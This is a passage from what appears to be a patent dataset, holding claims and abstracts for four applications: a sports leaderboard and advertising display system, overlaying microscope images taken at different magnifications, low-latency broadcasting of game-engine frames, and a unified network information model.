a. a tournament; b. a sporting event; c. a competition; and d. a contest. 10. The leaderboard parsing and distribution system according to claim 1, wherein at least one of the plurality of display devices is a touch screen configured to enable input by at least one of the following:
a. a golfer; b. a caddy; c. an athlete; d. a competitor; e. a contestant; f. a team representative; g. a manager; h. a coach; and i. a spectator. 11. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to:
a. access at least one advertisement; b. select at least one display device in the plurality of display devices; and c. cause the at least one advertisement to be displayed on the at least one display device. 12. The leaderboard parsing and distribution system according to claim 11, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the at least one display device. 13. A spectator advertising distribution system comprising:
a. at least one computing device comprising at least one processor; b. a plurality of groups of display devices communicatively coupled to the at least one computing device, each group in the plurality of groups of display devices associated with a distinct venue; and c. a non-transitory machine readable medium comprising instructions configured to cause the at least one processor to:
i. select at least one advertisement from a plurality of advertisements;
ii. select at least one group of display devices in the plurality of groups of display devices; and
iii. add the at least one advertisement to an advertising queue associated with the at least one group of display devices. 14. The spectator advertising distribution system according to claim 13, wherein the at least one computing device comprises at least one of the following:
a. a personal computer; b. a computer server; c. a mobile device; and d. a tablet. 15. The spectator advertising distribution system according to claim 13, wherein the plurality of groups of display devices are configured for multiple spectator viewing. 16. The spectator advertising distribution system according to claim 13, wherein the at least one group of display devices in the plurality of groups of display devices comprises at least one display device configured to be portable. 17. The spectator advertising distribution system according to claim 13, wherein the at least one group of display devices in the plurality of groups of display devices comprises at least one touch screen configured to enable input by at least one of the following:
a. a golfer; b. a caddy; c. an athlete; d. a competitor; e. a contestant; f. a team representative; g. a manager; and h. a coach. 18. The spectator advertising distribution system according to claim 13 wherein the distinct venue comprises at least one of the following:
a. a golf course;
b. a stadium;
c. a gymnasium;
d. at least one outdoor spectating area;
e. at least one indoor spectating area;
f. at least one transition area;
g. a club house;
h. at least one shooting area;
i. at least one body of water; and
j. at least one fishing area. 19. The spectator advertising distribution system according to claim 13, wherein the advertising queue is configured to store the at least one advertisement for addition to a set of streaming connections associated with the at least one group of display devices. 20. The spectator advertising distribution system according to claim 13, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the at least one advertisement and the at least one group of display devices. | A leaderboard parsing and distribution system comprises at least one computing device. The at least one computing device comprises at least one processor. The leaderboard parsing and distribution system comprises a plurality of display devices communicatively coupled to the at least one computing device. The leaderboard parsing and distribution system comprises a non-transitory machine readable medium. The non-transitory machine readable medium comprises instructions configured to cause the at least one processor to access leaderboard data. For at least two display devices in the plurality of display devices, the non-transitory machine readable medium comprises instructions configured to cause the at least one processor to select a subset of the leaderboard data to be displayed on each of the at least two display devices, and cause the subset of the leaderboard data to be displayed on the each of the at least two display devices.1. A leaderboard parsing and distribution system comprising:
a. at least one computing device comprising at least one processor; b. a plurality of display devices communicatively coupled to the at least one computing device; and c. a non-transitory machine readable medium comprising instructions configured to cause the at least one processor to:
i. access leaderboard data; and
ii. for at least two display devices in the plurality of display devices:
1. select a subset of the leaderboard data to be displayed on each of the at least two display devices; and
2. cause the subset of the leaderboard data to be displayed on the each of the at least two display devices. 2. The leaderboard parsing and distribution system according to claim 1, wherein the at least one computing device comprises at least one of the following:
a. a personal computer; b. a computer server; c. a mobile device; and d. a tablet. 3. The leaderboard parsing and distribution system according to claim 1, wherein at least two of the plurality of display devices are configured for multiple spectator viewing. 4. The leaderboard parsing and distribution system according to claim 1, wherein at least one display device in the plurality of display devices is configured to be portable. 5. The leaderboard parsing and distribution system according to claim 1, wherein the leaderboard data comprises at least one of the following:
a. HTML data; b. XML data; c. image data; and d. text. 6. The leaderboard parsing and distribution system according to claim 1, wherein the subset of the leaderboard data comprises data identifying at least one of the following:
a. a flight of golfers; b. a plurality of flights of golfers; c. an athlete; d. a plurality of athletes; e. a team; f. a plurality of teams; g. a competitor; h. a plurality of competitors; i. a contestant; and j. a plurality of contestants. 7. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to update the subset of the leaderboard data at regular intervals. 8. The leaderboard parsing and distribution system according to claim 1, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the subset of the leaderboard data and direct the subset to a specific display device in the plurality of display devices. 9. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to accept registrations for at least one of the following:
a. a tournament; b. a sporting event; c. a competition; and d. a contest. 10. The leaderboard parsing and distribution system according to claim 1, wherein at least one of the plurality of display devices is a touch screen configured to enable input by at least one of the following:
a. a golfer; b. a caddy; c. an athlete; d. a competitor; e. a contestant; f. a team representative; g. a manager; h. a coach; and i. a spectator. 11. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to:
a. access at least one advertisement; b. select at least one display device in the plurality of display devices; and c. cause the at least one advertisement to be displayed on the at least one display device. 12. The leaderboard parsing and distribution system according to claim 11, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the at least one display device. 13. A spectator advertising distribution system comprising:
a. at least one computing device comprising at least one processor; b. a plurality of groups of display devices communicatively coupled to the at least one computing device, each group in the plurality of groups of display devices associated with a distinct venue; and c. a non-transitory machine readable medium comprising instructions configured to cause the at least one processor to:
i. select at least one advertisement from a plurality of advertisements;
ii. select at least one group of display devices in the plurality of groups of display devices; and
iii. add the at least one advertisement to an advertising queue associated with the at least one group of display devices. 14. The spectator advertising distribution system according to claim 13, wherein the at least one computing device comprises at least one of the following:
a. a personal computer; b. a computer server; c. a mobile device; and d. a tablet. 15. The spectator advertising distribution system according to claim 13, wherein the plurality of groups of display devices are configured for multiple spectator viewing. 16. The spectator advertising distribution system according to claim 13, wherein the at least one group of display devices in the plurality of groups of display devices comprises at least one display device configured to be portable. 17. The spectator advertising distribution system according to claim 13, wherein the at least one group of display devices in the plurality of groups of display devices comprises at least one touch screen configured to enable input by at least one of the following:
a. a golfer; b. a caddy; c. an athlete; d. a competitor; e. a contestant; f. a team representative; g. a manager; and h. a coach. 18. The spectator advertising distribution system according to claim 13 wherein the distinct venue comprises at least one of the following:
a. a golf course;
b. a stadium;
c. a gymnasium;
d. at least one outdoor spectating area;
e. at least one indoor spectating area;
f. at least one transition area;
g. a club house;
h. at least one shooting area;
i. at least one body of water; and
j. at least one fishing area. 19. The spectator advertising distribution system according to claim 13, wherein the advertising queue is configured to store the at least one advertisement for addition to a set of streaming connections associated with the at least one group of display devices. 20. The spectator advertising distribution system according to claim 13, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the at least one advertisement and the at least one group of display devices. | 2,400 |
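Claim 1 of the leaderboard record above has the processor "select a subset of the leaderboard data to be displayed on each of the at least two display devices." The claims do not prescribe how subsets are chosen, so the page-per-display partition below is an assumption, and the function name and row format are hypothetical:

```python
from typing import Dict, List

def split_leaderboard(rows: List[dict], display_ids: List[str]) -> Dict[str, List[dict]]:
    """Partition leaderboard rows into contiguous subsets, one per display device.

    A sketch only: the patent leaves the selection rule open; here each display
    simply receives an equal-sized contiguous page of the standings.
    """
    if not display_ids:
        return {}
    per_page = -(-len(rows) // len(display_ids))  # ceiling division
    return {
        display_id: rows[i * per_page:(i + 1) * per_page]
        for i, display_id in enumerate(display_ids)
    }
```

For example, five standings rows split across two displays would put the first three rows on the first display and the remaining two on the second; re-running the split at regular intervals would correspond to claim 7's periodic update.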
9,143 | 9,143 | 15,593,760 | 2,485 | Provided are systems and methods that allow a user to capture images at low- and high-level magnification and then overlay the high-level magnification images on the low-level magnification image to ease review of the images. The high-level magnification images may be overlaid on the low-level magnification image based at least in part on the portion of the low-level magnification image from which the high-level image was originated. | 1. A method of image analysis, comprising:
collecting, at a first level of magnification, at least one first level image of a sample; collecting, at a second level of magnification that is greater than the first level of magnification, a first second level image that comprises a region of the corresponding first level image; and overlaying the first second level image on the first level image. 2. The method of claim 1, wherein the first second level image is overlaid on the first level image such that the first second level image is positioned according to the region of the first level image that is comprised in the first second level image. 3. The method of claim 1, further comprising collecting a second second level image that comprises a region of the corresponding first level image. 4. The method of claim 3, further comprising aligning the first second level image and the second second level image such that the aligned first second level image and the second second level images form a contiguous image of a region of the corresponding first level image. 5. The method of claim 4, wherein the aligning is at least partially effected by overlapping a region of the first second level image with a region of the second second level image. 6. The method of claim 3, further comprising overlaying the first second level image and the second second level images on the first level image. 7. The method of claim 6, wherein the first second level image and the second second level image are overlaid on the first level image such that they are positioned relative to one another according to the regions of the first level image that are comprised in the first second level image and the second second level image. 8. The method of claim 1, wherein the first level image and the second level image are each collected under different illumination conditions. 9.-11. (canceled) 12. The method of claim 1, further comprising enabling a user to, from a view of the first image, select and display the second image. 13. (canceled) 14. 
A sample analysis system, comprising:
an imaging device configured to (a) collect first level sample images at a first level of magnification and (b) collect second level sample images at a second level of magnification that is greater than the first level of magnification, a second level sample image comprising a region at least partially disposed within a corresponding first image; and a processor configured to effect overlaying the second level image on the first level image. 15. The system of claim 14, wherein the processor is configured to align a feature of at least one collected second level image with the corresponding feature of the first level image that corresponds to that second image. 16. The system of claim 11, wherein the processor is configured to overlay the first second level image on the first level image such that the first second level image is positioned according to the region of the first level image that is comprised in the first second level image. 17. The system of claim 11, wherein the processor is configured to collect a second second level image that comprises a region of the corresponding first level image. 18. The system of claim 17, wherein the processor is configured to align the first second level image and the second second level image such that the aligned first second level image and the second second level images form a contiguous image of a region of the corresponding first level image. 19. (canceled) 20. (canceled) 21. The system of claim 20, wherein the processor is configured to overlay the first second level image and the second second level image on the first level image such that they are positioned relative to one another according to the regions of the first level image that are comprised in the first second level image and the second second level image. 22.-38. (canceled) 39. A method of image analysis, comprising:
collecting, at a first level of magnification, a plurality of first level sample images; for each member of a set of at least some of the plurality of first level sample images, collecting at a second level of magnification greater than the first level of magnification one or more second level sample images that comprises a region at least partially disposed within that corresponding first level sample image; for at least some of those members of the set of first level sample images, aligning a feature of each of the one or more second images with the corresponding feature of that corresponding first level sample image; and overlaying the one or more second level sample images on the corresponding first level sample image. 40. The method of claim 39, wherein one or more second level sample images from within two or more first level sample images are taken at the same relative positions within the respective first level sample images. 41. The method of claim 39, wherein collecting the plurality of first level sample images, collecting the second level sample images, or both, is effected in an automated fashion. 42. The method of claim 39, wherein (a) at least one or more first level sample images is based on information taken at two or more focal planes, (b) wherein at least one or more second level sample images is based on information taken at two or more focal planes, or both (a) and (b). 43. The method of claim 39, wherein collecting a first level sample image and collecting a second level sample image is effected by changing objective lenses. 44.-50. (canceled) | Provided are systems and methods that allow a user to capture images at low- and high-level magnification and then overlay the high-level magnification images on the low-level magnification image to ease review of the images. 
The high-level magnification images may be overlaid on the low-level magnification image based at least in part on the portion of the low-level magnification image from which the high-level image was originated.1. A method of image analysis, comprising:
collecting, at a first level of magnification, at least one first level image of a sample; collecting, at a second level of magnification that is greater than the first level of magnification, a first second level image that comprises a region of the corresponding first level image; and overlaying the first second level image on the first level image. 2. The method of claim 1, wherein the first second level image is overlaid on the first level image such that the first second level image is positioned according to the region of the first level image that is comprised in the first second level image. 3. The method of claim 1, further comprising collecting a second second level image that comprises a region of the corresponding first level image. 4. The method of claim 3, further comprising aligning the first second level image and the second second level image such that the aligned first second level image and the second second level images form a contiguous image of a region of the corresponding first level image. 5. The method of claim 4, wherein the aligning is at least partially effected by overlapping a region of the first second level image with a region of the second second level image. 6. The method of claim 3, further comprising overlaying the first second level image and the second second level images on the first level image. 7. The method of claim 6, wherein the first second level image and the second second level image are overlaid on the first level image such that they are positioned relative to one another according to the regions of the first level image that are comprised in the first second level image and the second second level image. 8. The method of claim 1, wherein the first level image and the second level image are each collected under different illumination conditions. 9.-11. (canceled) 12. The method of claim 1, further comprising enabling a user to, from a view of the first image, select and display the second image. 13. (canceled) 14. 
A sample analysis system, comprising:
an imaging device configured to (a) collect first level sample images at a first level of magnification and (b) collect second level sample images at a second level of magnification that is greater than the first level of magnification, a second level sample image comprising a region at least partially disposed within a corresponding first image; and a processor configured to effect overlaying the second level image on the first level image. 15. The system of claim 14, wherein the processor is configured to align a feature of at least one collected second level image with the corresponding feature of the first level image that corresponds to that second image. 16. The system of claim 11, wherein the processor is configured to overlay the first second level image on the first level image such that the first second level image is positioned according to the region of the first level image that is comprised in the first second level image. 17. The system of claim 11, wherein the processor is configured to collect a second second level image that comprises a region of the corresponding first level image. 18. The system of claim 17, wherein the processor is configured to align the first second level image and the second second level image such that the aligned first second level image and the second second level images form a contiguous image of a region of the corresponding first level image. 19. (canceled) 20. (canceled) 21. The system of claim 20, wherein the processor is configured to overlay the first second level image and the second second level image on the first level image such that they are positioned relative to one another according to the regions of the first level image that are comprised in the first second level image and the second second level image. 22.-38. (canceled) 39. A method of image analysis, comprising:
collecting, at a first level of magnification, a plurality of first level sample images; for each member of a set of at least some of the plurality of first level sample images, collecting at a second level of magnification greater than the first level of magnification one or more second level sample images that comprises a region at least partially disposed within that corresponding first level sample image; for at least some of those members of the set of first level sample images, aligning a feature of each of the one or more second images with the corresponding feature of that corresponding first level sample image; and overlaying the one or more second level sample images on the corresponding first level sample image. 40. The method of claim 39, wherein one or more second level sample images from within two or more first level sample images are taken at the same relative positions within the respective first level sample images. 41. The method of claim 39, wherein collecting the plurality of first level sample images, collecting the second level sample images, or both, is effected in an automated fashion. 42. The method of claim 39, wherein (a) at least one or more first level sample images is based on information taken at two or more focal planes, (b) wherein at least one or more second level sample images is based on information taken at two or more focal planes, or both (a) and (b). 43. The method of claim 39, wherein collecting a first level sample image and collecting a second level sample image is effected by changing objective lenses. 44.-50. (canceled) | 2,400 |
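Claims 1–2 of the image-analysis record above overlay a higher-magnification image on the lower-magnification image, positioned according to the region it was captured from. A minimal sketch of that positioning follows; the resampling step is an assumption (the claims leave it unspecified), implemented here as naive striding:

```python
import numpy as np

def overlay(low_mag: np.ndarray, high_mag: np.ndarray,
            region_origin: tuple, magnification: int) -> np.ndarray:
    """Paste a downscaled high-magnification tile onto the low-magnification image.

    Sketch only: `region_origin` is the (row, col) of the low-mag region the tile
    was captured from, and striding stands in for a proper resampling filter.
    """
    out = low_mag.copy()
    tile = high_mag[::magnification, ::magnification]  # naive downscale
    r, c = region_origin
    out[r:r + tile.shape[0], c:c + tile.shape[1]] = tile
    return out
```

Tiling several high-magnification captures this way, with adjacent tiles placed at their respective origins (and optionally overlapped for alignment, per claims 4–5), yields the contiguous overlaid view the claims describe.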
9,144 | 9,144 | 15,902,803 | 2,421 | A system for low latency broadcast of animation frames includes a frame extractor stored in memory and executable to access frame data generated by a rendering pipeline of a frame generation engine. During runtime of the frame generation engine, the frame extractor exports the frame data for use external to the frame generation engine. | 1. A system for low-latency communication of frame data comprising:
a processor; memory; a frame extractor stored in memory and executable by the processor to access frame data generated by a rendering pipeline of a frame generation engine and to export the frame data for use external to the frame generation engine; and a broadcasting agent stored in the memory and executable by the processor to broadcast the frame data exported from the frame generation engine for viewing on a remote spectating device. 2. The system of claim 1, wherein the frame generation engine is a game engine. 3. The system of claim 1, wherein the frame generation engine is communicatively coupled to a graphics processing unit application programming interface (GPU API) via the rendering pipeline and the frame data is generated by the GPU API. 4. The system of claim 2, wherein the GPU API renders the frame data onto input of an encoder external to the frame generation engine without modifying the frame data. 5. The system of claim 4, wherein the broadcasting agent is executable to receive encoded frame data output from the encoder and to broadcast the encoded frame data to a spectating system for viewing on a remote spectating device. 6. The system of claim 1, wherein the frame extractor accesses the frame data by initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 7. The system of claim 6, wherein the frame extractor is further executable to use the pointer to draw data of the object onto input of an encoder. 8. One or more tangible computer-readable storage media of a tangible article of manufacture encoding computer-executable instructions for executing on a computer system a computer process, the computer process comprising:
accessing frame data generated by a rendering pipeline of a frame generation engine; exporting the frame data for use external to the frame generation engine; and broadcasting the exported frame data for viewing on a remote spectating device. 9. The one or more tangible computer-readable storage media of claim 8, wherein the frame generation engine is a game engine. 10. The one or more tangible computer-readable storage media of claim 8, wherein the frame generation engine is communicatively coupled to a graphics processing unit application programming interface (GPU API) via the rendering pipeline and the frame data is generated by the GPU API. 11. The one or more tangible computer-readable storage media of claim 8, wherein the computer process further comprises:
rendering the frame data onto input of an encoder external to the frame generation engine without altering a format of the frame data. 12. The one or more tangible computer-readable storage media of claim 8, wherein accessing the frame data further comprises:
initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 13. The one or more tangible computer-readable storage media of claim 12, further comprising:
using the received pointer to draw data of the object onto input of the encoder. 14. A device comprising:
a processor; memory; a frame extractor stored in the memory and executable by the processor to access frame data generated by a rendering pipeline of a frame generation engine and to export the frame data for use external to the frame generation engine; and a broadcasting agent stored in the memory and executable by the processor to broadcast the frame data exported from the frame generation engine for viewing on a remote spectating device. 15. The device of claim 14, wherein the frame generation engine is a game engine. 16. The device of claim 14, wherein the frame data includes unmodified output of a graphics processing unit application programming interface (GPU API), the GPU API communicatively coupled to the frame generation engine along the rendering pipeline. 17. The device of claim 16, further comprising:
an encoder stored in memory and executable to receive and encode the frame data generated by the GPU API. 18. The device of claim 14, wherein the frame extractor accesses the frame data by initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 19. The device of claim 18, wherein the frame extractor uses the pointer to draw data of the object onto input of an encoder. 20. The device of claim 14, wherein the frame extractor exports the frame data for external use by a computing module stored in the memory, the computing module being higher-level than the frame generation engine with respect to a graphics processing unit (GPU). | A system for low latency broadcast of animation frames includes a frame extractor stored in memory and executable to access frame data generated by a rendering pipeline of a frame generation engine. During runtime of the frame generation engine, the frame extractor exports the frame data for use external to the frame generation engine.1. A system for low-latency communication of frame data comprising:
a processor; memory; a frame extractor stored in memory and executable by the processor to access frame data generated by a rendering pipeline of a frame generation engine and to export the frame data for use external to the frame generation engine; and a broadcasting agent stored in the memory and executable by the processor to broadcast the frame data exported from the frame generation engine for viewing on a remote spectating device. 2. The system of claim 1, wherein the frame generation engine is a game engine. 3. The system of claim 1, wherein the frame generation engine is communicatively coupled to a graphics processing unit application programming interface (GPU API) via the rendering pipeline and the frame data is generated by the GPU API. 4. The system of claim 2, wherein the GPU API renders the frame data onto input of an encoder external to the frame generation engine without modifying the frame data. 5. The system of claim 4, wherein the broadcasting agent is executable to receive encoded frame data output from the encoder and to broadcast the encoded frame data to a spectating system for viewing on a remote spectating device. 6. The system of claim 1, wherein the frame extractor accesses the frame data by initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 7. The system of claim 6, wherein the frame extractor is further executable to use the pointer to draw data of the object onto input of an encoder. 8. One or more tangible computer-readable storage media of a tangible article of manufacture encoding computer-executable instructions for executing on a computer system a computer process, the computer process comprising:
accessing frame data generated by a rendering pipeline of a frame generation engine; exporting the frame data for use external to the frame generation engine; and broadcasting the exported frame data for viewing on a remote spectating device. 9. The one or more tangible computer-readable storage media of claim 8, wherein the frame generation engine is a game engine. 10. The one or more tangible computer-readable storage media of claim 8, wherein the frame generation engine is communicatively coupled to a graphics processing unit application programming interface (GPU API) via the rendering pipeline and the frame data is generated by the GPU API. 11. The one or more tangible computer-readable storage media of claim 8, wherein the computer process further comprises:
rendering the frame data onto input of an encoder external to the frame generation engine without altering a format of the frame data. 12. The one or more tangible computer-readable storage media of claim 8, wherein accessing the frame data further comprises:
initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 13. The one or more tangible computer-readable storage media of claim 12, further comprising:
using the received pointer to draw data of the object onto input of the encoder. 14. A device comprising:
a processor; memory; a frame extractor stored in the memory and executable by the processor to access frame data generated by a rendering pipeline of a frame generation engine and to export the frame data for use external to the frame generation engine; and a broadcasting agent stored in the memory and executable by the processor to broadcast the frame data exported from the frame generation engine for viewing on a remote spectating device. 15. The device of claim 14, wherein the frame generation engine is a game engine. 16. The device of claim 14, wherein the frame data includes unmodified output of a graphics processing unit application programming interface (GPU API), the GPU API communicatively coupled to the frame generation engine along the rendering pipeline. 17. The device of claim 16, further comprising:
an encoder stored in memory and executable to receive and encode the frame data generated by the GPU API. 18. The device of claim 14, wherein the frame extractor accesses the frame data by initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 19. The device of claim 18, wherein the frame extractor uses the pointer to draw data of the object onto input of an encoder. 20. The device of claim 14, wherein the frame extractor exports the frame data for external use by a computing module stored in the memory, the computing module being higher-level than the frame generation engine with respect to a graphics processing unit (GPU). | 2,400 |
9,145 | 9,145 | 16,045,817 | 2,445 | Systems and methods for managing and controlling a network include representing at least a portion of the network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions in the network related to networking, computing, and storage utilizing an architecture of elements representing bit transport, bit transformation and bit storage actions of the network; and managing elements and devices associated with the portion of the network utilizing the information model, wherein the elements and devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the elements and devices. | 1. A method for managing and controlling a network, the method comprising:
representing at least a portion of the network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions related to networking, computing, and storage utilizing the architecture via elements representing bit transport, bit transformation and bit storage actions; and managing devices associated with the portion of the network utilizing the information model, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 2. The method of claim 1, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 3. The method of claim 1, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 4. The method of claim 3, wherein the recursive architecture recurses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 5. The method of claim 3, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 6. The method of claim 3, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. 7. 
The method of claim 3, wherein, for the computing and the storage, files or code are treated as elements which are sources or sinks of information. 8. A network management system comprising at least one processor executing software instructions implementing the steps of:
representing at least a portion of a network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions related to networking, computing, and storage utilizing the architecture via elements representing bit transport, bit transformation and bit storage actions; and managing devices associated with the portion of the network utilizing the information model, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 9. The network management system of claim 8, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 10. The network management system of claim 8, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 11. The network management system of claim 10, wherein the recursive architecture recurses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 12. The network management system of claim 10, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 13. 
The network management system of claim 10, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. 14. The network management system of claim 10, wherein, for the computing and the storage, files or code are treated as elements which are sources or sinks of information. 15. A non-transitory computer-readable storage medium storing software instructions for controlling at least one computer to implement a model-view-controller system comprising an information model of a network, the information model including:
an architecture unifying networking, computing, and storage in at least a portion of the network together; elements representing bit transport, bit transformation and bit storage actions to model functions in the architecture related to networking, computing, and storage, wherein devices associated with the portion of the network utilize the information model for management thereof, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 16. The non-transitory computer-readable storage medium of claim 15, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 17. The non-transitory computer-readable storage medium of claim 15, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 18. The non-transitory computer-readable storage medium of claim 17, wherein the recursive architecture recurses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 19. The non-transitory computer-readable storage medium of claim 17, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 20. 
The non-transitory computer-readable storage medium of claim 17, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. | Systems and methods for managing and controlling a network include representing at least a portion of the network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions in the network related to networking, computing, and storage utilizing an architecture of elements representing bit transport, bit transformation and bit storage actions of the network; and managing elements and devices associated with the portion of the network utilizing the information model, wherein the elements and devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the elements and devices.1. A method for managing and controlling a network, the method comprising:
representing at least a portion of the network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions related to networking, computing, and storage utilizing the architecture via elements representing bit transport, bit transformation and bit storage actions; and managing devices associated with the portion of the network utilizing the information model, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 2. The method of claim 1, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 3. The method of claim 1, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 4. The method of claim 3, wherein the recursive architecture recurses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 5. The method of claim 3, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 6. The method of claim 3, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. 7. 
The method of claim 3, wherein, for the computing and the storage, files or code are treated as elements which are sources or sinks of information. 8. A network management system comprising at least one processor executing software instructions implementing the steps of:
representing at least a portion of a network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions related to networking, computing, and storage utilizing the architecture via elements representing bit transport, bit transformation and bit storage actions; and managing devices associated with the portion of the network utilizing the information model, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 9. The network management system of claim 8, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 10. The network management system of claim 8, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 11. The network management system of claim 10, wherein the recursive architecture recurses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 12. The network management system of claim 10, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 13. 
The network management system of claim 10, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. 14. The network management system of claim 10, wherein, for the computing and the storage, files or code are treated as elements which are sources or sinks of information. 15. A non-transitory computer-readable storage medium storing software instructions for controlling at least one computer to implement a model-view-controller system comprising an information model of a network, the information model including:
an architecture unifying networking, computing, and storage in at least a portion of the network together; elements representing bit transport, bit transformation and bit storage actions to model functions in the architecture related to networking, computing, and storage, wherein devices associated with the portion of the network utilize the information model for management thereof, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 16. The non-transitory computer-readable storage medium of claim 15, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 17. The non-transitory computer-readable storage medium of claim 15, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 18. The non-transitory computer-readable storage medium of claim 17, wherein the recursive architecture recurses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 19. The non-transitory computer-readable storage medium of claim 17, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 20. 
The non-transitory computer-readable storage medium of claim 17, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. | 2,400 |
